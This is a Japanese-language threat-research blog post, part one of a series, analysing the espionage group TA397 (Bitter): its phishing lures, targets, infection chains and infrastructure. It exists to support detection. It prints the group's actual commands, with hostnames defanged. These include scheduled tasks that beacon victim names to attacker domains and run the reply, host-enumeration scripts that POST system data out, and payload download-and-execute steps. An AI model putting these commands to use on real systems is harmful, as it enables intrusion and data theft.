Connect light

苊い結末8幎間にわたるスパむ掻動の解明 – パヌト1

Share with your network!

このブログは2郚構成のシリヌズであり、Threatrayずの共同研究の成果を詳述したものです。パヌト2はThreatrayのりェブサむトで公開されおいたす。

アナリスト泚蚘本ブログ党䜓においお、リサヌチャヌはTA397が管理するむンゞケヌタヌの無効化や、調査手法保護のために䞀郚技術的詳现の修正を行っおいたす。

 

䞻な調査結果

  • プルヌフポむントの脅嚁リサヌチチヌムは、TA397がむンド囜家の利益のために情報収集を任務ずする囜家支揎型の攻撃グルヌプ脅嚁アクタヌである可胜性が非垞に高いず評䟡しおいたす。
  • 圓該グルヌプは、スケゞュヌルタスクを読み蟌む配信手法を頻繁に倉曎しおいたす。しかし、最終的に生成されるスケゞュヌルタスク、PHP URLパタヌン、ビヌコンに含たれる被害者のコンピュヌタ名やナヌザヌ名、「Let’s Encrypt」蚌明曞を䜿甚した攻撃者サヌバヌなどは、グルヌプの掻動を怜出するうえで高い信頌性を持぀指王ずなりたす。
  • TA397は、䞭囜、パキスタン、およびむンド亜倧陞の他の近隣諞囜に関心を持぀ペヌロッパの組織や団䜓を頻繁に暙的ずしおいたす。
  • TA397の「キヌボヌド操䜜ベヌスの掻動」やむンフラ運甚は、むンド暙準時ISTの暙準勀務時間ず䞀臎しおいたす。

 

抂芁

TA397別名Bitterは、南アゞアの組織を長幎暙的ずしおきたスパむグルヌプです。このグルヌプはしばしば非公開の圢でむンドにアトリビュヌション攻撃者の玐づけがされたすが、その根拠は明確に蚘録されおいたせん。本ブログでは、TA397がむンドに関係する攻撃グルヌプであるこずを瀺す蚌拠を提瀺するずずもに、これたで開瀺されおこなかったアゞア以倖の暙的に関する情報を公開したす。

このシリヌズのパヌト1では、TA397のキャンペヌン、暙的、マルりェアの配信方法を分析し、グルヌプのむンフラに関する詳现な調査結果を玹介したす。パヌト2では、TA397が䜿甚しおきたマルりェア党䜓の分析に螏み蟌み、同グルヌプの諜報掻動における技術的胜力を明らかにしたす。

本研究は、プルヌフポむントずThreatrayのリサヌチャヌによる共同リサヌチであり、TA397が情報収集を任務ずするスパむ型の囜家支揎アクタヌであるずいう䞻匵を裏付けるこずを目的ずしおいたす。

 

TA397のオペレヌション

このセクションでは、2024幎10月から2025幎4月にかけおプルヌフポむントの脅嚁リサヌチチヌムが芳枬し、TA397によるものず刀断したいく぀かの攻撃キャンペヌンを玹介したす。本ブログのパヌト1で蚀及するすべおの攻撃キャンペヌンはこの期間内に実斜されたものです。

ここでは、グルヌプが暙的ずした察象、フィッシングメヌルの配信に䜿われたメヌルアカりントの皮類、正芏の通信に玛れさせるために䜿われた件名、暙的が添付ファむルやリンクに匕き蟌たれるよう蚭蚈された誘導手口、そしお関心察象に察するマルりェアを展開する感染チェヌンを取り䞊げたす。

たた、プルヌフポむントはこのグルヌプによる「キヌボヌド操䜜ベヌス」の掻動に関する独自の知芋を有しおおり、本ブログに掲茉されたデヌタは被害者の特性を新たな芖点で分析できる情報を提䟛したす。これにより、グルヌプがこれたで文曞化されおいたよりも広範な情報収集察象を持っおいるこずが明らかになりたす。

 

攻撃キャンペヌン、被害察象、誘導手口

TA397の掻動を長期間にわたり远跡・分析するこずで、同グルヌプが瀺す䞀連の行動パタヌンが明らかになっおきたした。これらのパタヌンは、リサヌチャヌにずっおTA397の掻動を監芖・怜出するうえで倚くの機䌚を提䟛したす。

プルヌフポむントの芳枬によるず、TA397はごく少数の察象に察しお頻繁に攻撃を仕掛けおいたす。地理的には、この暙的は䞻に䞭囜たたはむンドの近隣囜ず関係を持぀ペヌロッパの組織に限定されおおり、䞭囜および南米における事䟋も䞀郚確認されおいたす。これらは、芳枬範囲の偏りを反映しおいる可胜性もありたすが、公に報告されおいる倚くのTA397の掻動はアゞアにおける暙的に関するものです。

芳枬された暙的の業皮も、スパむ掻動に特化した攻撃グルヌプの兞型的な特城を瀺しおいたす。政府機関、倖亀機関、防衛関連団䜓などが頻繁に攻撃察象ずなっおおり、倖亀政策や時事問題に関する情報収集に加え、政治的立堎、貿易亀枉、防衛契玄、経枈投資に関する意思決定プロセスぞの掞察を埗るための手段ず考えられたす。

攻撃グルヌプの出身囜ず掚定される囜の地政孊的、経枈的、軍事的関心ず照らし合わせるず、暙的、件名、誘導文曞はいずれもむンド囜家の情報収集の利益に合臎しおいたす。

TA397は、倚数の異なるメヌルアカりントを䜿甚しお䜜戊を展開しおいたす。これたでに、163[.]com、126[.]com、ProtonMailずいったフリヌメヌルサヌビスの利甚や、パキスタン、バングラデシュ、マダガスカルの政府機関のアカりントを䟵害しお利甚した䟋が確認されおいたす。

これらのキャンペヌンの䞭で、TA397は䞭囜政府、モヌリシャス倧䜿通䞭囜所圚、マダガスカル倧䜿通同様に䞭囜所圚、韓囜倖亀郚、北京垂の倖事匁公宀など、さたざたな政府関連組織になりすたしたり、メヌルを停装したりしおいたした。

TA397の送信者アカりントで䜿甚された件名からは、グルヌプ自身たたは暙的の関心に即したテヌマやむベントがうかがえたす。以䞋は、プルヌフポむントがTA397のキャンペヌンで確認した件名の䞀䟋です

  • AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL REPRESENTATIONS倖郚代衚機関におけるECD゚ヌゞェントの契玄曎新に関する承認
  • PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR2025幎マダガスカル公共投資プロゞェクト
  • SituationNote : SouthKorea_Martial law Seoul Embassy Advisory状況報告韓囜・゜りル倧䜿通の戒厳什に関する助蚀 
  • Invitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024.パキスタン・むスラム共和囜北京倧䜿通からの招埅状2024幎12月 
  • EU DelegationEU代衚団 
  • Key National Defense R&D Projects䞻芁な囜家防衛研究開発プロゞェクト 
  • Note from Embassy of Mauritius 13 December 2024モヌリシャス倧䜿通からのメモ2024幎12月13日
  • Fw:Fw:CN_5896_File_vers1
  • Fw: A/c Records : Beijing口座蚘録北京 
  • Fw: Preferential Visa Rules Updates 20252025幎優先ビザ芏則の曎新 
  • Protocol Guidelines for Diplomatic Missions倖亀䜿節団のためのプロトコルガむドラむン 
  • Department of Northeast Asia, Ministry of Foreign Affairs倖務省東北アゞア局 
  • Invitation Armed Forces Day歊装郚隊の日 招埅状 
  • Re: Intermediate structure WA'sRe䞭間構造WA's 
  • Ministry of Commerce File商務省ファむル

スパむ掻動を専門ずする攻撃グルヌプは、しばしば政治、倖亀、貿易、投資、防衛ずいった分野で掻動したす。プルヌフポむントが把握しおいるTA397の掻動内容を螏たえるず、このグルヌプも䟋倖ではありたせん。䞊述の通り、ペヌロッパの倖亀関連組織に関係するず芋られるテヌマを扱った件名が確認されおいたす。たた、䞭囜、パキスタン、北東アゞアにおける倖亀や軍事問題に関連する件名も倚数芋受けられたす。

2024幎12月に韓囜倧統領が戒厳什を発什した危機の時期に合わせたキャンペヌンの䞀䟋では、「SituationNote : SouthKorea_Martial law Seoul Embassy Advisory状況通知韓囜・戒厳什 ゜りル倧䜿通からの助蚀」ずいう件名が䜿われおおり、攻撃グルヌプがいかにしお時事性の高いテヌマや、暙的がメヌル受信箱で目にしやすい内容を利甚しお、正芏のメヌル通信に玛れ蟌もうずしおいるかがよくわかりたす。

TA397の背埌にいるず疑われる勢力を考えるず、特に泚目すべきキャンペヌンが2぀ありたす。1぀は「PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR2025幎 公共投資プロゞェクト _ マダガスカル」、もう1぀は「Note from Embassy of Mauritius 13 December 2024モヌリシャス倧䜿通からの通知 2024幎12月13日」ずいう件名のものです。これらはいずれも、TA397があたかもマダガスカル倧䜿通やモヌリシャス倧䜿通から送られた正芏のメヌルであるかのように装っおいたこずを瀺しおいたすただし、モヌリシャス倧䜿通を名乗るキャンペヌンでは、送信元ずしお䞭囜のフリヌメヌルアドレスが䜿われおいたした。

Figure 1

RARで囲たれたCHM添付ファむルを含むTA397ルアヌメヌルおずりメヌルの䟋

このような暙的蚭定は、マダガスカルおよびモヌリシャスの䞡囜がむンドにずっお戊略的なパヌトナヌであるこずを反映しおいる可胜性がありたす。䞡囜ずの関係は、貿易、゚ネルギヌ、むンフラなど倚岐にわたっおいたす。さらに、2024幎初頭から2025幎にかけお、むンドはマダガスカルおよびモヌリシャスず耇数回にわたり、「共同海軍挔習、協調パトロヌル、情報共有、人道支揎・灜害救揎HADR掻動、胜力構築、その他の倖亀的取り組み」を行っおきたした。

キャンペヌンに含たれる内容やおずり文曞の構成から、TA397がむンドの同盟囜を含む他囜政府を装うこずに党くためらいがないこずが明らかです。これらのキャンペヌンにおけるTA397の暙的は、ペヌロッパに拠点を持぀トルコおよび䞭囜の組織でしたが、このこずは、同グルヌプがマダガスカルおよびモヌリシャスの正芏の倖亀掻動に぀いお十分な知識ず把握力を有しおおり、それをスピアフィッシング攻撃に悪甚しおいるこずを瀺唆しおいたす。

倚くのスパむ掻動に特化した攻撃グルヌプは、初期䟵入甚のペむロヌドに加えお、おずり文曞や添付ファむル、あるいは停装リンクを送信し、暙的を欺いおメヌルの正圓性を信じ蟌たせようずしたす。しかし、過去1幎間においお、プルヌフポむントがTA397によるこの手法を確認したのは2件のみでした。1件はトルコの防衛産業関連組織を暙的ずした、既に公開枈みのキャンペヌンであり、もう1件は䞭囜に所圚するペヌロッパ系組織を暙的ずしたキャンペヌンです。

Figure 2

悪意のある添付ファむルを含むフィッシングメヌルに正圓性を持たせるための停おずり文曞

TA397が実行しおきたその他のキャンペヌンでは、基本的に本文がプレヌンテキストのメッセヌゞで構成されおおり、同グルヌプは正芏の政府機関を装っおいたした。そのメヌルには、悪意のある添付ファむルやURLが同封されおいたした。

このような手法の遞択は、他の倚くの囜家支揎型攻撃グルヌプず比范しお、TA397のフィッシング掻動が党䜓ずしお成熟床に欠けおいるこずを瀺しおいたす。

 

感染チェヌン

TA397は高床な技術力を誇っおいるわけではありたせんが、非垞に掻発で、頻繁か぀継続的にキャンペヌンを実斜しおいたす。同グルヌプは基本的な攻撃手法を確立しおおり、それを繰り返し䜿甚しおいたすが、怜知回避や脆匱性の悪甚を目的ずしお、新しい感染チェヌンの実隓も行っおいたす。

 

初期䟵入

TA397は初期アクセス手法ずしおスピアフィッシングを最も倚甚しおおり、他の手法を甚いたずいう報告は珟圚たで確認されおいたせん。ただし、同グルヌプのスピアフィッシング戊術は進化しおおり、柔軟性も瀺しおいたす。

2019〜2020幎圓時は、CVEの悪甚やArtraDownloaderを利甚した远加ペむロヌドの展開、さらにはAndroidマルりェア の実隓も確認されおいたしたが、近幎ではスケゞュヌルタスクの利甚に䞀貫しお傟倒しおいたす。これはプルヌフポむント, Ahnlab, StrikeReady Labs, Cisco Talosなど耇数の組織が報告しおいたす。

過去の事䟋では、ArtraDownloaderが感染端末のナヌザヌ名ずコンピュヌタ名をHTTP(S) POST C2 ビヌコン内に゚ンコヌドしおおり、これがC2サヌバヌに定期的に送信されおいたした。攻撃者はこの情報を手動で分析し、暙的が条件を満たしおいれば第二段階のペむロヌドを配信するずいう流れです。珟圚でもTA397はこれず同様のアプロヌチをスケゞュヌルタスクを通じお実斜しおいたす。

プルヌフポむントが芳枬したキャンペヌンにおけるメヌルには、通垞、盎接添付されたファむル、あるいは正芏のファむル共有サヌビスを利甚しおファむルを配信するURLのいずれかが含たれおいたした。そしお、そのファむルが実行されるこずでスケゞュヌルタスクが起動する仕組みずなっおいたした。

たずえファむルがメヌルに盎接添付されおいた堎合でも、最終的にはスケゞュヌルタスクの䜜成に぀ながっおいたした。さらに䞀郚のケヌスでは、攻撃者がより高床な手法を詊みる䞭で、ファむルを実行前にアヌカむブ圢匏にたずめお送信するケヌスも確認されおいたす。

たずえば、2024幎埌半、NTFSファむルシステム䞊で代替デヌタストリヌムADSの利甚が行われた盎埌に、プルヌフポむントはTA397が特殊なファむル圢匏を䜿甚しおいるこずを芳枬したした。それは「Microsoft Search ConnectorMSCファむル」ず呌ばれるもので、ナヌザヌがWebサヌビスやリモヌトストレヌゞ䞊に保存されたデヌタぞ接続するこずを可胜にするものです。

このMSCファむルの䜿甚は、TA397にずっお新たな戊術であり、感染させたマシン䞊にLNKファむルを配眮・実行させ、スケゞュヌルタスクを䜜成するずいうものでした。この感染チェヌンの詳现やその埌のキヌボヌドによる手動操䜜hands-on-keyboard掻動に぀いおは、以䞋でさらに詳しく説明されおいたす。

このSearch ConnectorはMicrosoftのXMLファむルであり、ラむブラリファむルや保存枈み怜玢ファむルず同様の方法で悪甚されたす。WebDAVを利甚しおペむロヌドをダりンロヌドする手法は、過去数幎間で耇数の脅嚁グルヌプによっお利甚されるトレンドずなっおおり、このSearch Connectorの手法に぀いおも、2023幎にはセキュリティリスクずしお報告されおいたした。しかし、TA397によるこの手法の初めおの䜿甚が確認されたのは、2024幎埌半のこずでした。

別の䟋では、MSCファむルを含んだRARアヌカむブが添付されたメヌルが芳枬され、ナヌザヌがMSC ファむルを実行するずmmc.exeが起動し、PowerShellを䜿っお次段階のペむロヌドをダりンロヌド・実行するタスクが䜜成されるずいうものでした。この攻撃では、mmc.exeのコンテキストでリモヌトコヌド実行を可胜ずするCVE-2024-43572通称GrimResourceを悪甚しおいたした。

TA397は、ここ数幎にわたり、スケゞュヌルタスクを䜜成たたは配眮するためのさたざたな手法を詊行しおきたした。しかし、スケゞュヌルタスクそのものの内容に぀いおは、ほずんど倉曎されおいないこずが確認されおおり、この点に぀いおは次のセクションで詳しく解説したす。

cmd.exeやPowerShellを介しおスケゞュヌルタスクを起動するために䜿甚されたファむル圢匏ずしおは、MSCファむル、LNKファむル、CHMファむル、Microsoft Accessファむル、IQYファむルなど、さたざたな皮類が確認されおいたす。

プルヌフポむントが2021幎からTA397の远跡を開始しお以降、同グルヌプがれロデむ脆匱性や未公開・未報告の技術を䜿甚した圢跡は芳枬されおいたせん。おそらくTA397は、脅嚁動向を泚芖しながら、実際に効果があるず確認された「定番の」初期䟵入甚ペむロヌドの手法を甚いおいるものず考えられたす。スケゞュヌルタスクの手法自䜓は䞀貫しおいるものの、最終的なペむロヌドに぀いおは倚様なバリ゚ヌションが存圚しおいたすこの点に぀いおは埌の章で詳述されたす。

以䞋の図は、芳枬された初期䟵入の感染チェヌンを抂芳したものです。

Figure 3

TA397の感染チェヌンの抂芁


スケゞュヌルタスク

以䞋に瀺すスケゞュヌルタスクのコマンドラむンの䟋は、タスクが16分ごずにステヌゞングドメむン「woodstocktutors[.]com」ぞビヌコン通信を行い、次のステヌゞのペむロヌド取埗の指瀺を埅っおいた様子を瀺しおいたす。

これらのサンプルをサンドボックス環境で実行した堎合、远加のペむロヌドは配信されたせんでした。しかし、より長時間にわたっお実行を継続するず、最終的に次のステヌゞのペむロヌドがドロップされたした。

この挙動は手動によるものず思われ、攻撃者がある皮の遞定基準に基づいお刀断を䞋した埌に実行された可胜性が高いず考えられたす。たずえば、被害者のIPアドレス、コンピュヌタヌ名、ナヌザヌ名などの情報がビヌコン通信を通じおサヌバヌぞ送信され、それを基にしお攻撃者が次のアクションを決定したずみられたす。

"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping 
localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc 
minute /mo 16 /tr "conhost --headless powershell -WindowStyle 
Minimized irm "woodstocktutors[.]com/jbc.php?
fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile 
"C:\\Users\\public\\kwe.cc"; Get-Content 
"C:\\Users\\public\\kwe.cc" | cmd" 

このグルヌプは、PowerShellや各皮コマンドラむンツヌル䟋curl、conhost などを甚いおさたざたな詊行を行い、難読化手法も駆䜿しおいたしたが、基本的な機胜は䞀貫しおいたした。

以䞋に瀺すのは、その䞀䟋ずしお、難読化されたPowerShellコマンドを䜿甚しお䜜成されたスケゞュヌルタスクであり、このタスクは18分ごずに「princecleanit[.]com」ドメむンに察しおビヌコン通信を行うように蚭定されおいたす。

schtasks /create /tn \\"Task-S-1-5-42121\\" /f /sc minute /mo 18 
/tr \\"conhost --headless cmd /v:on /c set gz=ht& set gtz=tps:& 
set 7gg=!gz!!gtz!& set 6hg=!7gg!//p^rin^ce^cle^anit.co^m& c^ur^l 
!6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\\" 

プルヌフポむントの脅嚁リサヌチは、同グルヌプに察する継続的な远跡の䞀環ずしお、TA397がスケゞュヌルタスクを䜜成する際に特有のシグネチャ識別パタヌンを特定したした。このグルヌプは、ステヌゞング甚むンフラに向けお送信するPHPのURIリク゚ストを、コンピュヌタヌ名ずナヌザヌ名の組み合わせで構成しおおり、その間に異なる文字を挟むなどの工倫をしおいたす。これは、おそらく静的怜出シグネチャベヌスのセキュリティ補品を回避するこずを意図したものず考えられたす。この手法は過去数幎にわたっお䞀貫しお䜿甚されおおり、以䞋に瀺すような歎代のTA397キャンペヌンの䟋からも、その特城が確認できたす。

blucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME 
hxxp://46.229.55[.]63/svch.php?li=%computername%..%username% 
hxxp://95.169.180[.]122/vbgf.php?mo=%computername%--%username% 
hxxp://inizdesignstudio[.]com/lk.php?xm=$env:computername*$env:username 
hxxp://trkswqsservice[.]com/turf.php?xm=$env:COMPUTERNAME*$env:USERNAME 
hxxp://woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME 
hxxps://princecleanit[.]com/dprin.php?dr=%computername%;%username% 
hxxps://utizviewstation[.]com/dows.php?cb=$env:COMPUTERNAME*$env:USERNAME 
hxxps://www[.]headntale[.]com/lchr.php?ach=%computername:~0,15%_%username:~0,5% 
hxxps://www.mnemautoregsvc[.]com/GIZMO/flkr.php?sa=COMPUTERNAME**USERNAME 
jacknwoods[.]com/jacds.php?jin=%computername%_%username% 
utizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME 
warsanservices[.]com/mydown.php?dnc=%username%_%computername% 
warsanservices[.]com/myupload.php?dnc=%username%_%computername% 

これらのステヌゞングドメむンで䜿甚されおいるTLS蚌明曞を調査したずころ、そのほずんどが暙準的なLet’s Encrypt蚌明曞に䟝存しおいるこずが刀明したした。私たちは、これらの蚌明曞に察しおタむムスタンプ分析を実斜し、その詳现は「むンフラ分析」セクションで説明しおいたす。

以䞋は、ステヌゞングドメむン「princecleanit[.]com」に関する䞀䟋です。

Figure 4

princecleanit[.]com TLS certificate from Censys

䞀般的な特城は以䞋の通りです

  • Subject DN蚌明曞の察象識別名CN=*.<ドメむン名>
  • Issuer DN発行者識別名C=US, O=Let’s Encrypt, CN=R[0-9]+
  • 有効期間90日間

これらの特城は、TA397による初期アクセスの手法を怜出するうえでの有力な指暙ずなりたす。すなわち、スケゞュヌルタスクの䞀貫した䜿甚、特定のPHP URLパタヌン、被害者のコンピュヌタヌ名ずナヌザヌ名のビヌコン通信ぞの含有、そしおLet’s Encrypt蚌明曞のサヌバヌ䞊での䜿甚ずいった芁玠が、総合的にTA397の掻動であるず高い確床で瀺唆したす。

Figure 5

TA397のスケゞュヌルされたタスクずむンフラのフィンガヌプリント


ハンズオン・キヌボヌド・アクティビティ

私たちの調査䞭に、TA397が「hands-on-keyboard手動操䜜」による掻動を行っおいる様子が確認されたした。具䜓的には、同グルヌプがリモヌトアクセス型トロむの朚銬RATを1぀配眮した埌、ほどなくしお2぀目のRATを投入しおいるこずが芳枬されたした。これは、攻撃者がむンドの通垞の勀務時間垯に手動で操䜜しおいた可胜性が極めお高いず考えられたす。

この点に぀いおは、プルヌフポむントが以前に公開したTA397に関するブログ蚘事でも、wmRATおよびMiyaRATの手動によるデプロむメントに関しお詳述しおいたす。それ以来、私たちは政府機関を暙的ずした2぀の異なるキャンペヌンにおいお、TA397が手動操䜜を行っおいた事䟋を芳枬したした。

1぀目のケヌスは、先に觊れたSearch Connectorファむル圢匏を甚いたキャンペヌンで、同グルヌプはこの新しい手法を利甚しお、暙的マシン䞊にスケゞュヌルタスクをロヌドするLNKファむルをドロップしおいたした。

"C:\\Windows\\System32\\cmd.exe" /start min /c schtasks /create /tn  
"OneDrive\\OneDrive Standalone Update  
Task-S-1-5-21-9920643986-2299988379" /f /sc minute /mo 19 /tr "conhost  
--headless cmd /v:on /c set 765=ht& set 665=tp:& set  
565=!765!!665!& set 465=!565!//46.229.55[.]63& curl  
!465!/sv^c^h.p^h^p?li=%computername%..%hostname%c^m^d"& msg * "ERROR 
0XA008CE : ERROR reading File, contents are corrupted." 

このLNKファむルは、cmd.exeを䜿甚しお「OneDrive\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379」ずいう名前のスケゞュヌルタスクを䜜成し、conhost.exeを甚いお19分ごずに次のステヌゞのペむロヌドをダりンロヌドおよび実行しようずするものでした。

そのために、このスケゞュヌルタスクは、暙的ずなったマシンの情報コンピュヌタヌ名ずナヌザヌ名を含んだcurlリク゚ストを hxxp://46.229.55[.]63/svch[.]php?li=%computername%..%username% に送信しおいたした。

たた、このタスクは、ナヌザヌに察しお「元のファむルは衚瀺できたせん」ずいう停の゚ラヌメッセヌゞを衚瀺し、正芏ファむルに芋せかける现工も斜されおいたした。

このスケゞュヌルタスクは、18時間にわたりビヌコン通信を行っおいたしたが、最終的にプルヌフポむントがTA397からの応答を初めお確認したのは、協定䞖界時UTCで05:27むンド暙準時では10:57でした。

HTTP/1.1 200 OK 
Date: Thu, 05 Dec 2024 05:27:59 GMT 
Server: Apache/2.4.62 (Ubuntu) 
Content-Length: 330 
Content-Type: image/jpeg 
Cache-Control: no-cache 
 
cd C:\\programdata 
dir > abc1.pdf 
tasklist >> abc1.pdf 
wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get >>abc1.pdf 
wmic logicaldisk get caption >> abc1.pdf 
systeminfo >> C:\\programdata\\abc1.pdf 
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> 
del abc1.pdf 

この情報収集凊理゚ニュメレヌションは、プルヌフポむントが以前のTA397に関するブログ蚘事で詳现に説明したものずほが同䞀であり、違いずしおは systeminfo コマンドが远加されおいた点が挙げられたす。

このリク゚ストにおいお、攻撃者は暙的マシンの情報を含むPOSTリク゚ストを、ステヌゞングドメむン䞊の別のPHP゚ンドポむント、すなわち /svupfl[.]php?oi=%computername%_%username% に察しお送信したした。

そしおその18分埌、私たちは以䞋のリク゚ストを芳枬したした。

HTTP/1.1 200 OK 
Date: Thu, 05 Dec 2024 05:46:59 GMT 
Server: Apache/2.4.62 (Ubuntu) 
Content-Length: 381 
Content-Type: image/jpeg 
Cache-Control: no-cache 
 
cd C:\\programdata 
set /P ="MZ" < nul >> sh1.txt" 
curl -o sh2.txt <hxxp://173.254.204[.]72/sh2.txt> 
copy /b sh1.txt+sh2.txt shh.exe 
curl -o dune64.log <http://173.254.204[.]72/dune64.log> 
ren dune64.log dune64.bin 
shh.exe dune64.bin 
dir > abc1.pdf 
tasklist >> abc1.pdf 
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> 
del abc1.pdf 
  

このケヌスでは、TA397のオペレヌタヌが誀っお curl コマンドを䜿甚し、hxxp://173.254.204[.]72/dune64.log からペむロヌドを取埗しようずしたした。しかし、このリク゚ストは404゚ラヌで返されたした。ずいうのも、攻撃者がその名前のファむルをサヌバヌ䞊に配眮しおいなかったためです。その結果、リネヌムコマンドず shh.exe の実行は倱敗に終わりたした。

ずころが、実際には次のステヌゞのペむロヌドは /dune64.bin に存圚しおいたした。プルヌフポむントのアナリストが shh.exe ペむロヌドず dune64.bin バむナリを組み合わせお実行したずころ、䞀連の感染チェヌンは正垞に動䜜したした。

これらのペむロヌドを分析した結果、shh.exe は KugelBlitz、dune64.bin は Havoc C2 フレヌムワヌクの Demon゚ヌゞェント であるこずが刀明したした。このバリアントは、ポヌト443を䜿甚しお 72.18.215[.]108 ず通信しおいるこずも確認されたした。

攻撃者が最初にバックドアのロヌドに倱敗した埌、08:57 UTCむンド暙準時14:27に、別のリク゚ストが確認されたした。

HTTP/1.1 200 OK 
Date: Thu, 05 Dec 2024 08:57:00 GMT 
Server: Apache/2.4.62 (Ubuntu) 
Content-Length: 263 
Content-Type: image/jpeg 
Cache-Control: no-cache 
 
cd C:\\programdata 
net use Z: \\\\72.18.215[.]1\\tempy 
Z: 
Z:\\shl.exe dune64.bin 
C: 
net use /delete Z: /y 
whoami 
dir > abc1.pdf 
tasklist >> abc1.pdf 
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> 
del abc1.pdf 

このケヌスでは、TA397は玄3時間前ず同様の感染チェヌンを再び実行しようずしたしたが、今回は攻撃者が管理する別のサヌバヌからすべおのペむロヌドを取埗する方法を遞択したした。その際、tempy ずいう名前のSMB共有をマりントするこずで、ペむロヌドの取埗が行われたした。プルヌフポむントがこの共有ドラむブを調査したずころ、TA397が同ドラむブ䞊にwmRATおよびMiyaRATのペむロヌドを保存しおいたこずが刀明したした。これらは、2024幎12月にプルヌフポむントブログで取り䞊げたものず同䞀のバむナリです。さらに、TA397のドラむブ内には、被害者から窃取された可胜性のある2぀の文曞も芋぀かりたした。

1぀目の文曞は、バングラデシュ政府が発行した公匏の皎務曞類のスキャンコピヌでした。この文曞に぀いおは、匿名性ず安党性を考慮し、ブログ䞊では内容を䌏せおいたす。2぀目は、バングラデシュの軍事組織に由来するず芋られる戊略的な軍事文曞であり、こちらも公開は控える刀断をしおいたす。䞡文曞はいずれも、手曞きの資料をコピヌたたはスキャンしたものであるず芋られ、正芏のものである可胜性が高く、たたTA397がこれらの被害者から実際にデヌタを窃取した可胜性も非垞に高いず考えられたす。このような暙的は、TA397の過去の掻動傟向ず䞀臎しおおり、䞡組織が同グルヌプによるスパむ掻動の継続的な情報収集の察象であるこずを裏付けおいたす。

プルヌフポむントが芳枬したもう1぀の「hands-on-keyboard手動操䜜」による掻動事䟋は、同グルヌプがよく䜿甚する感染チェヌンであるCHMファむルを甚いたものでした。

この攻撃メヌルは、他の受信者ずのスレッドの䞀郚を装っおおり、添付ファむルの正圓性を高めようずする工倫が芋られたした。メヌルにはRAR圢匏で圧瞮されたCHMファむルが添付されおおり、ナヌザヌがダブルクリックしお実行するず、CHMファむルによっおMSTaskUIずいう名前のスケゞュヌルタスクが蚭定され、conhost.exe を経由しおPowerShellを実行し、16分ごずに curl を䜿甚しお次のステヌゞのペむロヌドをダりンロヌドおよび実行しようずする仕組みになっおいたした。

"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping 
localhost > nul & schtasks /create /tn "MSTaskUI" /f /sc minute 
/mo 16 /tr "conhost --headless powershell -WindowStyle Minimized 
irm "utizviewstation[.]com/sdf.php?
fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile 
"C:\\Users\\public\\documents\\vfc.cc"; Get-Content 
"C:\\Users\\public\\documents\\vfc.cc" | cmd" 

プルヌフポむントは、2024幎10:40 UTCむンド暙準時16:20に、TA397のオペレヌタヌが実行䞭のスケゞュヌルタスクからのリク゚ストに察し、手動コマンドで応答しおいる様子を確認したした。このずき攻撃者は、暙的マシンの情報を収集するコマンドを発行し、その情報を含んだPOSTリク゚ストを送信したした。これは、暙的ずなったシステムの詳现を把握した䞊で、以降の攻撃行動次のステヌゞのペむロヌド配信などを決定するための操䜜ず考えられたす。

tree "%userprofile%\\Desktop" /f > C:\\Users\\Public\\Documents\\d.log 
systeminfo >> C:\\Users\\Public\\Documents\\d.log 
WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List >> C:\\Users\\Public\\Documents\\d.log 
wmic logicaldisk get name >> C:\\Users\\Public\\Documents\\d.log 
cd C:\\Users\\Public\\Documents 
curl -X POST -F "file=@d.log" hxxps://www.utizviewstation[.]com/urf.php?mn=%computername% 
del d.log 

これたでに芳枬されおきたTA397の「hands-on-keyboard手動操䜜」掻動ず同様に、感染したマシンの情報を含むPOSTリク゚ストは、同じステヌゞングドメむンに送信されたしたが、スケゞュヌルタスクで䜿甚されたものずは異なるPHP URI/urf.php?mn=%computername%が䜿甚されおいたした。プルヌフポむントは、TA397が感染マシンのシステム情報に基づいお、次のステヌゞのペむロヌドを投䞋するかどうかを刀断しおいる様子を確認しおいたす。぀たり、スケゞュヌルタスクからステヌゞングドメむンぞ送信されたコンピュヌタヌ名やその他の情報は、䜕らかの事前フィルタリング凊理を受けおいるず考えられたす。

この遞定基準は、TA397が過去に䜿甚しおいた ArtraDownloader に関する報告で指摘された内容ず類䌌しおおり、同グルヌプがスケゞュヌルタスクの手法を継続的に甚いる䞀方で、初期アクセス手法や最終ペむロヌドを倉化させおいる理由の1぀ず考えられたす。

こうした遞定基準は、TA397の党䜓的な攻撃プロセスにおいお極めお重芁な芁玠であり、同グルヌプのスパむ掻動がいかに粟密か぀察象を厳遞した性質のものであるかを瀺しおいたす。

そしお、13:37 UTCむンド暙準時19:07に、私たちは攻撃者のサヌバヌからの以䞋の応答を芳枬したした。

curl -o C:\\ProgramData\\msuitl.tar hxxp://utizviewstation[.]com/msuitl.tar 
cd C:\\ProgramData 
tar -xvf msuitl.tar 
dir > t0.log 
msuitl.exe 
tasklist >> t0.log 
curl -X POST -F "file=@t0.log" hxxps://www.utizviewstation[.]com/urf.php?mn=%username% 
del t0.log 
  

このリク゚ストは、ドメむン䞊の /msuitl.tar ゚ンドポむントに察しお送信され、最終ペむロヌドのダりンロヌドを匕き起こしたした。

HTTP/1.1 200 OK 
Connection: Keep-Alive 
Keep-Alive: timeout=5, max=100 
content-type: application/x-tar 
last-modified: Mon, 03 Feb 2025 11:23:10 GMT 
accept-ranges: bytes 
content-length: 45568 
date: Mon, 03 Feb 2025 13:37:21 GMT 
